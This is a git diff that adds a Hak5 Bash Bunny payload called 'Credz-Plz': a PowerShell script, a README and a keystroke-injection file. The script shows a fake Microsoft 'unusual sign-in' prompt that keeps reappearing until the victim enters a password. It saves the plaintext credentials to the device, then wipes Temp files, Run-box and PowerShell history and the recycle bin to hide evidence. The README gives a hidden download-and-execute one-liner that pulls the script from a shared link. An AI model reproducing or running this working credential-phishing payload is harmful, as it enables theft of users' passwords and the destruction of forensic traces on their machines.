diff --git a/payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1 b/payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1 new file mode 100644 index 00000000..c50de216 --- /dev/null +++ b/payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1 @@ -0,0 +1,178 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This script is meant to trick your target into sharing their credentials through a fake authentication pop up message + +.DESCRIPTION + A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" + This will be followed by a fake authentication ui prompt. + If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up + Once the target enters their credentials their information will be uploaded to your Bash Bunny + +#> + +#------------------------------------------------------------------------------------------------------------------------------------ + +# Creating loot folder + +# Get Drive Letter +$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name + +# Test if directory exists if not create directory in loot folder to store file +$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername" + +if(!(Test-Path -Path $TARGETDIR )){ + mkdir $TARGETDIR +} + +#------------------------------------------------------------------------------------------------------------------------------------ + +$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt" + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to generate the ui.prompt you will use to harvest their credentials +#> + +function Get-Creds { +do{ +$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password + if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) { + [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!") + Get-Creds +} +$creds = $cred.GetNetworkCredential() | fl +return $creds + # ... + + $done = $true +} until ($done) + +} + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to pause the script until a mouse movement is detected +#> + +function Pause-Script{ +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X +$o=New-Object -ComObject WScript.Shell + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +} + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off +#> + +function Caps-Off { +Add-Type -AssemblyName System.Windows.Forms +$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') + +#If true, toggle CapsLock key, to ensure that the script doesn't fail +if ($caps -eq $true){ + +$key = New-Object -ComObject WScript.Shell +$key.SendKeys('{CapsLock}') +} +} +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to call the function to pause the script until a mouse movement is detected then activate the pop-up +#> + +Pause-Script + +Caps-Off + +Add-Type -AssemblyName System.Windows.Forms + +[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account") + +$creds = Get-Creds + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to save the gathered credentials to a file in the temp directory +#> + +echo $creds >> $env:TMP\$FileName + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This exfiltrates your loot to the Bash Bunny +#> + +Move-Item $env:TMP\$FileName $TARGETDIR\$FileName + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + diff --git a/payloads/library/credentials/-BB-Credz-Plz/README.md b/payloads/library/credentials/-BB-Credz-Plz/README.md new file mode 100644 index 00000000..0f9b198e --- /dev/null +++ b/payloads/library/credentials/-BB-Credz-Plz/README.md @@ -0,0 +1,102 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Credz-Plz + +A script used to prompt the target to enter their creds to later be exfiltrated with dropbox. + +## Description + +A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" +This will be followed by a fake authentication ui prompt. +If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up +Once the target enters their credentials their information will be uploaded to your dropbox for collection + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg) + +![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/payloads/library/credentials/-BB-Credz-Plz/payload.txt b/payloads/library/credentials/-BB-Credz-Plz/payload.txt new file mode 100644 index 00000000..b6650db1 --- /dev/null +++ b/payloads/library/credentials/-BB-Credz-Plz/payload.txt @@ -0,0 +1,22 @@ +# Title: Credz-Plz +# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny +# Author: I am Jakoby +# Version: 1.0 +# Category: Recon +# Attackmodes: HID, Storage +# Target: Windows 10, 11 + +LED SETUP + +GET SWITCH_POSITION + +ATTACKMODE HID STORAGE + +LED STAGE1 + +QUACK DELAY 3000 +QUACK GUI r +QUACK DELAY 100 +LED STAGE2 +QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')" +QUACK ENTER diff --git a/payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg b/payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg new file mode 100644 index 00000000..3330e2a4 Binary files /dev/null and b/payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg differ diff --git a/payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg b/payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg new file mode 100644 index 00000000..ff0aad93 Binary files /dev/null and b/payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg differ